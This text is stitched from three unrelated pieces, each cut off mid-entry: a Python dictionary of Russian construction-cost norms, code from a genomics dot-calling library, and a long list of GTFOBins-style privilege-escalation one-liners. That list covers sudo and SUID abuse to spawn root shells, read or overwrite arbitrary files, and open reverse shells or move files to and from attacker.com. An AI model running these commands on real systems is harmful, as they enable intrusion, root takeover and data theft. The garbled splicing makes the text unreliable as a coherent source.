    # Unit of measurement: 100 m2 of openings.
    # Filling door openings with individual elements in log walls, by
    # opening area:
    # "10-01-040-1 (workers)": 442 man-hours
    '_-Работа строительной бригады (нормо-часов)':442,
    'Гвозди строительные (килограмм)':0.3,
    'Ерши металлические (килограмм)':25,
    'Бруски обрезные хвойные 50x100x6000 мм (кубометр)':0.51,
    'Доски обрезные хвойные 25x100x6000 мм (кубометр)':0.08,
    'Наличники (метр)':660,
    'Коробки дверные (метр)':315,
    'Использование бортового автомобиля до 5 тонн (часов)':4.47,
    #'Полотна для блоков дверных (квадратный метр)':85,
}
metadict_model['Установка оконных блоков (каркас) (100 квадратных метров)'] = {
    # Table GESN 10-01-027: installation of window blocks with sashes in
    # residential and public buildings.
    # http://www.norm-load.ru/SNiP/Data1/56/56034/index.htm#i255538
    # 01. Installing the blocks.
    # 02. Caulking the frames.
    # 03. Installing window sills and casings.
    # 04. Installing surface-mounted hardware.
    # Unit of measurement: 100 m2 of openings.
    # Installation of window blocks with sashes in residential and public
    # buildings:
    # "10-01-027-11" (workers): 260 man-hours
    '_-Работа строительной бригады (нормо-часов)':260,
    'Бруски обрезные хвойные 50x100x6000 мм (кубометр)':0.32,
    'Пакля пропитаная (килограмм)':260,
    'Гвозди строительные (килограмм)':16,
    'Шурупы строительные (килограмм)':11.4,
    'Паста антисептическая строительная (килограмм)':2.2,
    'Доски подоконные деревянные (метр)':83,
    'Вода для строительства (кубометр)':0.4,
    'Наличники (метр)':587,
    'Использование шуруповёрта (часов)':8.55,
    'Использование бортового автомобиля до 5 тонн (часов)':4.16,
    #'Блоки оконные (квадратный метр)':100,
}
metadict_model['Установка оконных блоков (сруб) (100 квадратных метров)'] = {
    # Table GESN 10-01-027: installation of window blocks with sashes in
    # residential and public buildings.
    # http://www.norm-load.ru/SNiP/Data1/56/56034/index.htm#i255538
    # 01. Installing the blocks.
    # 02. Nailing vertical battens to the frames to form a tongue and
    #     cutting a groove in the ends of beams (logs).
    # 03. Caulking the frames.
    # 04. Installing surface-mounted hardware.
    # Unit of measurement: 100 m2 of openings.
    # "10-01-027-07" (workers): 470 man-hours
    '_-Работа строительной бригады (нормо-часов)':470,
    'Бруски обрезные хвойные 50x100x6000 мм (кубометр)':0.63,
    'Пакля пропитаная (килограмм)':260,
    'Гвозди строительные (килограмм)':16,
    'Шурупы строительные (килограмм)':11.4,
    'Паста антисептическая строительная (килограмм)':2.2,
    'Доски подоконные деревянные (метр)':83,
    'Вода для строительства (кубометр)':2,
    'Наличники (метр)':587,
    'Использование шуруповёрта (часов)':6.55,
    'Использование бортового автомобиля до 5 тонн (часов)':4.28,
    #'Блоки оконные (квадратный метр)':100,
}
metadict_model['Установка мебели (100 штук)'] = {
    # Table GESN 10-01-059: installation of piece products.
    # http://www.norm-load.ru/SNiP/Data1/56/56034/index.htm#i586522
    # Installation of tables, under-sink cabinets, refrigerated cabinets etc.
    # 01. Installing piece products with fastening and sealing of junction
    #     seams with beads.
    # Unit of measurement: 100 pcs. of products.
    # "10-01-059-01" (workers): 75.15 man-hours
    # "10-01-059-01" (machine operators): 2.3 man-hours
    '_-Работа строительной бригады (нормо-часов)':78,
    'Гвозди строительные (килограмм)':12,
    'Подковки из квадратных заготовок (килограмм)':35,
    'Штапик деревянный 19x19 мм (метров)':400,
    'Использование подъёмника одномачтового 500 кг (часов)':1.73,
    'Использование бортового автомобиля до 5 тонн (часов)':2.47,
}
metadict_model['Простая окраска масляными составами (100 квадратных метров)'] = {
    # Table GESN 15-04-024: simple painting with oil-based compounds.
    # http://www.norm-load.ru/SNiP/Data1/54/54295/index.htm#i1635472
    # Simple oil painting over wood:
    # 15-04-024-01 walls
    # Unit of measurement: 100 m2 of painted surface.
    # "15-04-024-01" (workers): 28 man-hours
    '_-Работа маляра (нормо-часов)':28,
    'Олифа комбинированная марки К-2 (килограмм)':8.4,
    'Шпатлёвка масляно-клеевая (килограмм)':5,
    'Краски масляные (килограмм)':27,
    'Использование подъёмника одномачтового 500 кг (часов)':0.01,
    'Использование бортового автомобиля до 5 тонн (часов)':0.05,
}
metadict_model['Улучшенная окраска масляными составами (100 квадратных метров)'] = {
    # Table GESN 15-04-025: improved painting with oil-based compounds.
    # http://www.norm-load.ru/SNiP/Data1/54/54295/index.htm#i1656646
    # Improved oil painting over wood:
    # 15-04-025-01 walls
    # Unit of measurement: 100 m2 of painted surface.
    # "15-04-025-01" (workers): 58.52 man-hours
    '_-Работа маляра (нормо-часов)':58,
    'Олифа для улучшенной окраски (килограмм)':9.1,
    'Шпатлёвка масляно-клеевая (килограмм)':38,
    'Краски масляные (килограмм)':26,
    'Использование подъёмника одномачтового 500 кг (часов)':0.01,
    'Использование бортового автомобиля до 5 тонн (часов)':0.05,
}
metadict_model['Улучшенная штукатурка цементно-известковым раствором (100 квадратных метров)'] = {
    # Table GESN 15-02-001: improved plastering with cement-lime mortar over
    # masonry.
    # http://www.norm-load.ru/SNiP/Data1/56/56039/index.htm#i707554
    # 01. Surface preparation.
    # 02. Applying mortar to surfaces with leveling and troweling of the
    #     finishing coat.
    # 03. Running mouldings with dressing of corners.
    # 04. Curing of the plaster.
    # Unit of measurement: 100 m2 of plastered surface.
    # Improved plastering of facades with cement-lime mortar over masonry:
    # 15-02-001-01 walls
    # "15-02-001-01" (workers): 70.88 man-hours
    # "15-02-001-01" (machine operators): 2.78 man-hours
    '_-Работа штукатура (нормо-часов)':75,
    'Раствор отделочный цементно-известковый (кубометр)':1.89,
    'Вода для строительства (кубометр)':0.35,
    'Использование растворонасоса 3 кубометра/час (часов)':2.78,
    'Использование лебёдки электрической на 1.25 тонн (часов)':0.9,
}
metadict_model['Облицовка керамическими плитками (100 квадратных метров)'] = {
    # Table GESN 15-01-019: plain facing of walls, columns, pilasters and
    # reveals.
    # http://www.norm-load.ru/SNiP/Data1/56/56039/index.htm#i226171
    # 01. Nailing wire mesh onto wooden surfaces and making the base layer
    #     with groove cutting.
    # 02. Sorting the tiles.
    # 03. Facing the surfaces.
    # 04. Cutting tiles and grinding the edges.
    # 05. Grouting the joints.
    # 06. Powdering the faced surfaces.
    # 07. Cleaning and washing the facing surface.
    # Plain facing of walls, columns, pilasters and reveals (without cornice,
    # plinth and corner tiles), with installation of toilet-set tiles on a
    # dry-mix adhesive:
    # Unit of measurement: 100 m2 of faced surface.
    # 15-01-019-08 over wood
    # 15-01-019-08 (workers): 204.07 man-hours
    '_-Работа каменщика (нормо-часов)':206,
    'Сетка проволочная тканая с ячейками №5 (квадратный метр)':105,
    'Плитки керамические рядковые (квадратный метр)':99,
    'Клей для облицовочных работ (килограмм)':375,
    'Смесь сухая для заделки швов (килограмм)':50,
    'Раствор отделочный цементно-известковый (кубометр)':1.2,
    'Вода для строительства (кубометр)':0.93,
    'Использование автопогрузчика 5 тонн (часов)':0.05,
    'Использование подъёмника одномачтового 500 кг (часов)':0.81,
}
metadict_model['Прокладка 400-мм водопровода (1000 метров)'] = {
    # Table GESN 22-01-006: laying cast-iron pressure socket water pipes with
    # sockets sealed with asbestos cement.
    # http://www.norm-load.ru/SNiP/Data1/54/54313/index.htm#i127040
    # 01. Lowering and laying the pipes.
    # 02. Sealing the sockets with tarred strand and asbestos-cement mortar.
    # 03. Hydraulic testing of the pipeline with erecting and dismantling
    #     temporary thrust blocks.
    # Unit of measurement: 1 km of pipeline.
    # Laying cast-iron pressure socket water pipes, sockets sealed with
    # asbestos cement, diameter:
    # 22-01-006-10 400 mm
    # "22-01-006-10" (workers): 802 man-hours
    # "22-01-006-10" (machine operators): 191.59 man-hours
    '_-Работа строительной бригады (нормо-часов)':802 + 191.59,
    'Чугунная труба напорная раструбная 400-мм (метр)':1000,
    'Каболка (килограмм)':129,
    'Бруски обрезные хвойные 50x100x6000 мм (кубометр)':0.45,
    'Раствор кладочный М200 (кубометр)':0.18,
    'Раствор асбестоцементный (кубометр)':0.094,
    'Вода для строительства (кубометр)':194,
    'Использование электростанции передвижной 4 кВт (часов)':6.96,
    'Использование установки для гидравлических испытаний трубопрводов (часов)':60,
    'Использование трубоукладчика для труб диаметром до 400 мм (часов)':155.49,
    'Использование бортового автомобиля до 5 тонн (часов)':0.68,
}
metadict_model['Прокладка 200-мм водопровода (1000 метров)'] = {
# Таблица ГЭСН 22-01-006 Укладка водопроводных чугунных напорных раструбных труб
# при заделке раструбов асбестоцементом
# http://www.norm-load.ru/SNiP/Data1/54/54313/index.htm#i127040
# 01. Опускание и укладка труб.
# 02. Заделка раструбов смоляной прядью и асбестоцементным раствором.
# 03. Гидравлическое испытание трубопровода с устройством и разборкой временных упоров.
# Измеритель: 1 км трубопровода
# Укладка водопроводных чугунных напорных раструбных труб
# при заделке раструбов асбестоцементом диаметром:
# 22-01-006-06 200 мм
# "22-01-006-06" (рабочие): 510 нормо-часа
# "22-01-006-06" (машинисты): 20.91 нормо-часа
'_-Работа строительной бригады (нормо-часов)':510 + 20.91,
'Чугунная труба напорная раструбная 200-мм (метр)':1000,
'Каболка (килограмм)':73,
'Бруски обрезные хвойные 50x100x6000 мм | |
*
* * * * * * * * * * *
WARNING: be careful with extracting
expected in this case, as it is
not trivial at all !!!
square = True
* * * * * * * * * * *
* * * * *
* * * * *
* * * * *
* * * * * * * * * * *
* * * * *
* * * * *
* * * * * * * * * * *
* * * * * * * * * * *
* * * * *
* * * * *
* * * * * * * * * * *
"""
size = stop - start
tiles = size // step + bool(size % step)
if verbose:
logging.info(
f"matrix of size {size}X{size} to be splitted\n"
+ f" into square tiles of size {step}.\n"
+ f" A small 'edge' of size w={edge} is added, to allow for\n"
+ " meaningfull convolution around boundaries.\n"
+ f" Resulting number of tiles is {tiles * tiles}"
)
for tx in range(tiles):
for ty in range(tiles):
lwx = max(0, step * tx - edge)
rwx = min(size, step * (tx + 1) + edge)
if square and (rwx >= size):
lwx = size - step - edge
lwy = max(0, step * ty - edge)
rwy = min(size, step * (ty + 1) + edge)
if square and (rwy >= size):
lwy = size - step - edge
yield (lwx + start, rwx + start), (lwy + start, rwy + start)
def heatmap_tiles_generator_diag(clr, view_df, pad_size, tile_size, band_to_cover):
    """
    Generate heatmap tiles needed to cover a diagonal band of each region.

    Every tile is "padded" with a pad_size edge so that pixels near tile
    boundaries can still be convolved with a full kernel.

    Parameters
    ----------
    clr : cooler
        Cooler object used to translate genomic regions into bin extents.
    view_df : viewframe
        Viewframe with genomic regions to process: chrom, start, end, name.
    pad_size : int
        Padding added around each tile; typically the outer kernel size.
    tile_size : int
        Side of a heatmap tile.
    band_to_cover : int
        Width of the diagonal band the tiles must cover; typically the
        max_loci_separation used for dot calling.

    Yields
    ------
    (region_name, tilei, tilej) : tuple
        Region name plus the row-index and column-index spans of a tile.
    """
    for chrom, start, end, region_name in view_df.itertuples(index=False):
        lo, hi = clr.extent((chrom, start, end))
        for row_span, col_span in square_matrix_tiling(lo, hi, tile_size, pad_size):
            # Range of diagonal offsets touched by this tile.
            min_diag = col_span[0] - row_span[1]
            max_diag = col_span[1] - row_span[0]
            # Overlap of [min_diag, max_diag] with the band [0, band_to_cover].
            overlap = min(band_to_cover, max_diag) - max(0, min_diag)
            # Requiring overlap > 2*pad_size also excludes tiles that lie in
            # the lower triangle.
            if overlap > 2 * pad_size:
                yield region_name, row_span, col_span
##################################
# kernel-convolution related:
##################################
def _convolve_and_count_nans(O_bal, E_bal, E_raw, N_bal, kernel):
"""
Dense versions of a bunch of matrices needed for convolution and
calculation of number of NaNs in a vicinity of each pixel. And a kernel to
be provided of course.
"""
# a matrix filled with the kernel-weighted sums
# based on a balanced observed matrix:
KO = convolve(O_bal, kernel, mode="constant", cval=0.0, origin=0)
# a matrix filled with the kernel-weighted sums
# based on a balanced expected matrix:
KE = convolve(E_bal, kernel, mode="constant", cval=0.0, origin=0)
# get number of NaNs in a vicinity of every
# pixel (kernel's nonzero footprint)
# based on the NaN-matrix N_bal.
# N_bal is shared NaNs between O_bal E_bal,
# is it redundant ?
NN = convolve(
N_bal.astype(np.int64),
# we have to use kernel's
# nonzero footprint:
(kernel != 0).astype(np.int64),
mode="constant",
# there are only NaNs
# beyond the boundary:
cval=1,
origin=0,
)
######################################
# using cval=0 for actual data and
# cval=1 for NaNs matrix reduces
# "boundary issue" to the "number of
# NaNs"-issue
# ####################################
# now finally, E_raw*(KO/KE), as the
# locally-adjusted expected with raw counts as values:
Ek_raw = np.multiply(E_raw, np.divide(KO, KE))
# return locally adjusted expected and number of NaNs
# in the form of dense matrices:
return Ek_raw, NN
########################################################################
# this is the MAIN function to get locally adjusted expected
########################################################################
def get_adjusted_expected_tile_some_nans(
origin, observed, expected, bal_weights, kernels, balance_factor=None, verbose=False
):
"""
Get locally adjusted expected for a collection of local-filters (kernels).
Such locally adjusted expected, 'Ek' for a given kernel,
can serve as a baseline for deciding whether a given
pixel is enriched enough to call it a feature (dot-loop,
flare, etc.) in a downstream analysis.
For every pixel of interest [i,j], locally adjusted
expected is a product of a global expected in that
pixel E_bal[i,j] and an enrichment of local environ-
ment of the pixel, described with a given kernel:
::
KERNEL[i,j](O_bal)
Ek_bal[i,j] = E_bal[i,j]* ------------------
KERNEL[i,j](E_bal)
where KERNEL[i,j](X) is a result of convolution
between the kernel and a slice of matrix X centered
around (i,j). See link below for details:
https://en.wikipedia.org/wiki/Kernel_(image_processing)
Returned values for observed and all expecteds
are rescaled back to raw-counts, for the sake of
downstream statistical analysis, which is using
    Poisson test to decide if a given pixel is enriched.
(comparison between balanced values using Poisson-
test is intractable):
::
KERNEL[i,j](O_bal)
Ek_raw[i,j] = E_raw[i,j]* ------------------ ,
KERNEL[i,j](E_bal)
where E_raw[i,j] is:
::
1 1
-------------- * -------------- * E_bal[i,j]
bal_weights[i] bal_weights[j]
Parameters
----------
origin : (int,int) tuple
        tuple of integers that specify the
location of an observed matrix slice.
Measured in bins, not in nucleotides.
observed : numpy.ndarray
square symmetrical dense-matrix
that contains balanced observed O_bal
expected : numpy.ndarray
square symmetrical dense-matrix
that contains expected, calculated
based on balanced observed: E_bal.
bal_weights : numpy.ndarray or (numpy.ndarray, numpy.ndarray)
1D vector used to turn raw observed
into balanced observed for a slice of
a matrix with the origin on the diagonal;
and a tuple/list of a couple of 1D arrays
in case it is a slice with an arbitrary
origin.
kernels : dict of (str, numpy.ndarray)
dictionary of kernels/masks to perform
convolution of the heatmap. Kernels
describe the local environment, and
used to estimate baseline for finding
enriched/prominent peaks.
Peak must be enriched with respect to
all local environments (all kernels),
to be considered significant.
        Dictionary keys must contain names for
each kernel.
        Note, scipy.ndimage.convolve flips the kernel
first and only then applies it to matrix.
balance_factor: float
Multiplicative Balancing factor:
balanced matrix multiplied by this factor
sums up to the total number of reads (taking
symmetry into account) instead of number of
bins in matrix. defaults to None and skips
a lowleft KernelObserved factor calculation.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
We need this to test how dynamic donut size
is affecting peak calling results.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
verbose: bool
Set to True to print some progress
messages to stdout.
Returns
-------
peaks_df : pandas.DataFrame
sparsified DataFrame that stores results of
locally adjusted calculations for every kernel
for a given slice of input matrix. Multiple
        instances of such 'peaks_df' can be concatena-
ted and deduplicated for the downstream analysis.
Reported columns:
bin1_id - bin1_id index (row), adjusted to origin
bin2_id - bin bin2_id index, adjusted to origin
la_exp - locally adjusted expected (for each kernel)
la_nan - number of NaNs around (each kernel's footprint)
exp.raw - global expected, rescaled to raw-counts
obs.raw - observed values in raw-counts.
"""
# extract origin coordinate of this tile:
io, jo = origin
# let's extract full matrices and ice_vector:
O_raw = observed # raw observed, no need to copy, no modifications.
E_bal = np.copy(expected)
# 'bal_weights': ndarray or a couple of those ...
if isinstance(bal_weights, np.ndarray):
v_bal_i = bal_weights
v_bal_j = bal_weights
elif isinstance(bal_weights, (tuple, list)):
v_bal_i, v_bal_j = bal_weights
else:
raise ValueError(
"'bal_weights' must be an | |
[
"sudo env /bin/sh"
],
"base64":
[
"LFILE=file_to_read\nsudo base64 \"$LFILE\" | base64 --decode"
],
"zypper":
[
"sudo zypper x\n",
"TF=$(mktemp -d)\ncp /bin/sh $TF/zypper-x\nsudo PATH=$TF:$PATH zypper x\n"
],
"curl":
[
"URL=http://attacker.com/file_to_get\nLFILE=file_to_save\nsudo curl $URL -o $LFILE\n"
],
"hd":
[
"LFILE=file_to_read\nsudo hd \"$LFILE\"\n"
],
"nroff":
[
"TF=$(mktemp -d)\necho '#!/bin/sh' > $TF/groff\necho '/bin/sh' >> $TF/groff\nchmod +x $TF/groff\nsudo GROFF_BIN_PATH=$TF nroff\n"
],
"pg":
[
"sudo pg /etc/profile\n!/bin/sh\n"
],
"zsoelim":
[
"LFILE=file_to_read\nsudo zsoelim \"$LFILE\"\n"
],
"cowsay":
[
"TF=$(mktemp)\necho 'exec \"/bin/sh\";' >$TF\nsudo cowsay -f $TF x\n"
],
"dialog":
[
"LFILE=file_to_read\nsudo dialog --textbox \"$LFILE\" 0 0\n"
],
"uuencode":
[
"LFILE=file_to_read\nsudo uuencode \"$LFILE\" /dev/stdout | uudecode\n"
],
"comm":
[
"LFILE=file_to_read\nsudo comm $LFILE /dev/null 2>/dev/null\n"
],
"chmod":
[
"LFILE=file_to_change\nsudo chmod 6777 $LFILE\n"
],
"mawk":
[
"sudo mawk 'BEGIN {system(\"/bin/sh\")}'"
],
"rev":
[
"LFILE=file_to_read\nsudo rev $LFILE | rev\n"
],
"wish":
[
"sudo wish\nexec /bin/sh <@stdin >@stdout 2>@stderr\n"
],
"nohup":
[
"sudo nohup /bin/sh -c \"sh <$(tty) >$(tty) 2>$(tty)\""
],
"telnet":
[
"RHOST=attacker.com\nRPORT=12345\nsudo telnet $RHOST $RPORT\n^]\n!/bin/sh\n"
],
"od":
[
"LFILE=file_to_read\nsudo od -An -c -w9999 \"$LFILE\"\n"
],
"time":
[
"sudo /usr/bin/time /bin/sh"
],
"bundler":
[
"sudo bundler help\n!/bin/sh\n"
],
"rsync":
[
"sudo rsync -e 'sh -c \"sh 0<&2 1>&2\"' 127.0.0.1:/dev/null"
],
"mail":
[
"sudo mail --exec='!/bin/sh'"
],
"logsave":
[
"sudo logsave /dev/null /bin/sh -i"
],
"screen":
[
"sudo screen"
],
"lua":
[
"sudo lua -e 'os.execute(\"/bin/sh\")'"
],
"busctl":
[
"sudo busctl --show-machine\n!/bin/sh\n"
],
"csplit":
[
"LFILE=file_to_read\ncsplit $LFILE 1\ncat xx01\n"
],
"tee":
[
"LFILE=file_to_write\necho DATA | sudo tee -a \"$LFILE\"\n"
],
"iftop":
[
"sudo iftop\n!/bin/sh\n"
],
"eb":
[
"sudo eb logs\n!/bin/sh\n"
],
"troff":
[
"LFILE=file_to_read\nsudo troff $LFILE\n"
],
"git":
[
"sudo PAGER='sh -c \"exec sh 0<&1\"' git -p help",
"sudo git -p help config\n!/bin/sh\n",
"sudo git branch --help config\n!/bin/sh\n",
"TF=$(mktemp -d)\ngit init \"$TF\"\necho 'exec /bin/sh 0<&2 1>&2' >\"$TF/.git/hooks/pre-commit.sample\"\nmv \"$TF/.git/hooks/pre-commit.sample\" \"$TF/.git/hooks/pre-commit\"\nsudo git -C \"$TF\" commit --allow-empty -m x\n",
"TF=$(mktemp -d)\nln -s /bin/sh \"$TF/git-x\"\nsudo git \"--exec-path=$TF\" x\n"
],
"fmt":
[
"LFILE=file_to_read\nsudo fmt -999 \"$LFILE\"\n"
],
"tail":
[
"LFILE=file_to_read\nsudo tail -c1G \"$LFILE\"\n"
],
"expect":
[
"sudo expect -c 'spawn /bin/sh;interact'"
],
"openssl":
[
"RHOST=attacker.com\nRPORT=12345\nmkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s\n"
],
"unexpand":
[
"LFILE=file_to_read\nsudo unexpand -t99999999 \"$LFILE\"\n"
],
"smbclient":
[
"sudo smbclient '\\\\attacker\\share'\n!/bin/sh\n"
],
"service":
[
"sudo service ../../bin/sh"
],
"check_by_ssh":
[
"sudo check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C xx"
],
"dpkg":
[
"sudo dpkg -l\n!/bin/sh\n",
"sudo dpkg -i x_1.0_all.deb"
],
"iconv":
[
"LFILE=file_to_read\n./iconv -f 8859_1 -t 8859_1 \"$LFILE\"\n"
],
"grep":
[
"LFILE=file_to_read\nsudo grep '' $LFILE\n"
],
"hping3":
[
"sudo hping3\n/bin/sh\n"
],
"irb":
[
"sudo irb\nexec '/bin/bash'\n"
],
"apt-get":
[
"sudo apt-get changelog apt\n!/bin/sh\n",
"TF=$(mktemp)\necho 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' > $TF\nsudo apt-get install -c $TF sl\n",
"sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh"
],
"cpan":
[
"sudo cpan\n! exec '/bin/bash'\n"
],
"strace":
[
"sudo strace -o /dev/null /bin/sh"
],
"redcarpet":
[
"LFILE=file_to_read\nsudo redcarpet \"$LFILE\"\n"
],
"ruby":
[
"sudo ruby -e 'exec \"/bin/sh\"'"
],
"csh":
[
"sudo csh"
],
"ul":
[
"LFILE=file_to_read\nsudo ul \"$LFILE\"\n"
],
"genisoimage":
[
"LFILE=file_to_read\nsudo genisoimage -q -o - \"$LFILE\"\n"
],
"facter":
[
"TF=$(mktemp -d)\necho 'exec(\"/bin/sh\")' > $TF/x.rb\nsudo FACTERLIB=$TF facter\n"
],
"timeout":
[
"sudo timeout --foreground 7d /bin/sh"
],
"taskset":
[
"sudo taskset 1 /bin/sh"
],
"ssh-keyscan":
[
"LFILE=file_to_read\nsudo ssh-keyscan -f $LFILE\n"
],
"nawk":
[
"sudo nawk 'BEGIN {system(\"/bin/sh\")}'"
],
"pdb":
[
"TF=$(mktemp)\necho 'import os; os.system(\"/bin/sh\")' > $TF\nsudo pdb $TF\ncont\n"
],
"red":
[
"sudo red file_to_write\na\nDATA\n.\nw\nq\n"
],
"ghc":
[
"sudo ghc -e 'System.Process.callCommand \"/bin/sh\"'"
],
"capsh":
[
"sudo capsh --"
],
"docker":
[
"sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh"
],
"tclsh":
[
"sudo tclsh\nexec /bin/sh <@stdin >@stdout 2>@stderr\n"
],
"dash":
[
"sudo dash"
],
"zsh":
[
"sudo zsh"
],
"join":
[
"LFILE=file_to_read\nsudo join -a 2 /dev/null $LFILE\n"
],
"at":
[
"echo \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" | sudo at now; tail -f /dev/null\n"
],
"su":
[
"sudo su"
],
"top":
[
"echo -e 'pipe\\tx\\texec /bin/sh 1>&0 2>&0' >>/root/.config/procps/toprc\nsudo top\n# press return twice\nreset\n"
],
"awk":
[
"sudo awk 'BEGIN {system(\"/bin/sh\")}'"
],
"cp":
[
"LFILE=file_to_write\necho \"DATA\" | sudo cp /dev/stdin \"$LFILE\"\n",
"LFILE=file_to_write\nTF=$(mktemp)\necho \"DATA\" > $TF\nsudo cp $TF $LFILE\n"
],
"gimp":
[
"sudo gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.system(\"sh\")'"
],
"chroot":
[
"sudo chroot /\n"
],
"xmodmap":
[
"LFILE=file_to_read\nsudo xmodmap -v $LFILE\n"
],
"perl":
[
"sudo perl -e 'exec \"/bin/sh\";'"
],
"mtr":
[
"LFILE=file_to_read\nsudo mtr --raw -F \"$LFILE\"\n"
],
"sort":
[
"LFILE=file_to_read\nsudo sort -m \"$LFILE\"\n"
],
"man":
[
"sudo man man\n!/bin/sh\n"
],
"cat":
[
"LFILE=file_to_read\nsudo cat \"$LFILE\"\n"
],
"tar":
[
"sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
],
"aria2c":
[
"COMMAND='id'\nTF=$(mktemp)\necho \"$COMMAND\" > $TF\nchmod +x $TF\nsudo aria2c --on-download-error=$TF http://x\n"
],
"shuf":
[
"LFILE=file_to_write\nsudo shuf -e DATA -o \"$LFILE\"\n"
],
"sed":
[
"sudo sed -n '1e exec sh 1>&0' /etc/hosts"
],
"composer":
[
"TF=$(mktemp -d)\necho '{\"scripts\":{\"x\":\"/bin/sh -i 0<&3 1>&3 2>&3\"}}' >$TF/composer.json\nsudo composer --working-dir=$TF run-script x\n"
],
"check_memory":
[
"LFILE=file_to_read\nsudo check_memory --extra-opts=@$LFILE\n"
],
"soelim":
[
"LFILE=file_to_read\nsudo soelim \"$LFILE\"\n"
],
"look":
[
"LFILE=file_to_read\nsudo look '' \"$LFILE\"\n"
],
"tmux":
[
"sudo tmux"
],
"bash":
[
"sudo bash"
],
"chown":
[
"LFILE=file_to_change\nsudo chown $(id -un):$(id -gn) $LFILE\n"
],
"unshare":
[
"sudo unshare /bin/sh"
],
"readelf":
[
"LFILE=file_to_read\nsudo readelf -a @$LFILE\n"
],
"cut":
[
"LFILE=file_to_read\nsudo cut -d \"\" -f1 \"$LFILE\"\n"
],
"mv":
[
"LFILE=file_to_write\nTF=$(mktemp)\necho \"DATA\" > $TF\nsudo mv $TF $LFILE\n"
],
"vi":
[
"sudo vi -c ':!/bin/sh' /dev/null"
],
"valgrind":
[
"sudo valgrind /bin/sh"
],
"lwp-download":
[
"URL=http://attacker.com/file_to_get\nLFILE=file_to_save\nsudo lwp-download $URL $LFILE\n"
],
"crontab":
[
"sudo crontab -e"
]
}
suid_bins = {
"head":
[
"LFILE=file_to_read\n./head -c1G \"$LFILE\"\n"
],
"systemctl":
[
"TF=$(mktemp).service\necho '[Service]\nType=oneshot\nExecStart=/bin/sh -c \"id > /tmp/output\"\n[Install]\nWantedBy=multi-user.target' > $TF\n./systemctl link $TF\n./systemctl enable --now $TF\n"
],
"arp":
[
"LFILE=file_to_read\n./arp -v -f \"$LFILE\"\n"
],
"ash":
[
"./ash"
],
"cupsfilter":
[
"LFILE=file_to_read\n./cupsfilter -i application/octet-stream -m application/octet-stream $LFILE\n"
],
"ip":
[
"LFILE=file_to_read\n./ip -force -batch \"$LFILE\"\n",
"./ip netns add foo\n./ip netns exec foo /bin/sh -p\n./ip netns delete foo\n"
],
"flock":
[
"./flock -u / /bin/sh -p"
],
"find":
[
"./find . -exec /bin/sh -p \\; -quit"
],
"gdb":
[
"./gdb -nx -ex 'python import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")' -ex quit"
],
"make":
[
"COMMAND='/bin/sh -p'\n./make -s --eval=$'x:\\n\\t-'\"$COMMAND\"\n"
],
"diff":
[
"LFILE=file_to_read\n./diff --line-format=%L /dev/null $LFILE\n"
],
"ksshell":
[
"LFILE=file_to_read\n./ksshell -i $LFILE\n"
],
"ss":
[
"LFILE=file_to_read\n./ss -a -F $LFILE\n"
],
"tftp":
[
"RHOST=attacker.com\n./tftp $RHOST\nput file_to_send\n"
],
"nice":
[
"./nice /bin/sh -p"
],
"vim":
[
"./vim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
],
"python":
[
"./python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'"
],
"update-alternatives":
[
"LFILE=/path/to/file_to_write\nTF=$(mktemp)\necho DATA >$TF\n./update-alternatives --force --install \"$LFILE\" x \"$TF\" 0\n"
],
"nmap":
[
"LFILE=file_to_write\n./nmap -oG=$LFILE DATA\n"
],
"more":
[
"./more file_to_read"
],
"ionice":
[
"./ionice /bin/sh -p"
],
"emacs":
[
"./emacs -Q -nw --eval '(term \"/bin/sh -p\")'"
],
"jq":
[
"LFILE=file_to_read\n./jq -Rr . \"$LFILE\"\n"
],
"uniq":
[
"LFILE=file_to_read\n./uniq \"$LFILE\"\n"
],
"busybox":
[
"./busybox sh"
],
"lwp-request":
[
"LFILE=file_to_read\n./lwp-request \"file://$LFILE\"\n"
],
"pr":
[
"LFILE=file_to_read\npr -T $LFILE\n"
],
"view":
[
"./view -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
],
"tbl":
[
"LFILE=file_to_read\n./tbl $LFILE\n"
],
"nl":
[
"LFILE=file_to_read\n./nl -bn -w1 -s '' $LFILE\n"
],
"rview":
[
"./rview -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
],
"file":
[
"LFILE=file_to_read\n./file -f $LFILE\n"
],
"dig":
[
"LFILE=file_to_read\n./dig -f $LFILE\n"
],
"xargs":
[
"./xargs -a /dev/null sh -p"
],
"expand":
[
"LFILE=file_to_read\n./expand \"$LFILE\"\n"
],
"strings":
[
"LFILE=file_to_read\n./strings \"$LFILE\"\n"
],
"restic":
[
"RHOST=attacker.com\nRPORT=12345\nLFILE=file_or_dir_to_get\nNAME=backup_name\n./restic backup -r \"rest:http://$RHOST:$RPORT/$NAME\" \"$LFILE\"\n"
],
"xxd":
[
"LFILE=file_to_read\n./xxd \"$LFILE\" | xxd -r\n"
],
"eqn":
[
"LFILE=file_to_read\n./eqn \"$LFILE\"\n"
],
"ksh":
[
"./ksh -p"
],
"ld.so":
[
"./ld.so /bin/sh -p"
],
"date":
[
"LFILE=file_to_read\n./date -f $LFILE\n"
],
"tac":
[
"LFILE=file_to_read\n./tac -s 'RANDOM' \"$LFILE\"\n"
],
"wget":
[
"URL=http://attacker.com/file_to_get\nLFILE=file_to_save\n./wget $URL -O $LFILE\n"
],
"start-stop-daemon":
[
"./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p"
],
"column":
[
"LFILE=file_to_read\n./column $LFILE\n"
],
"gtester":
[
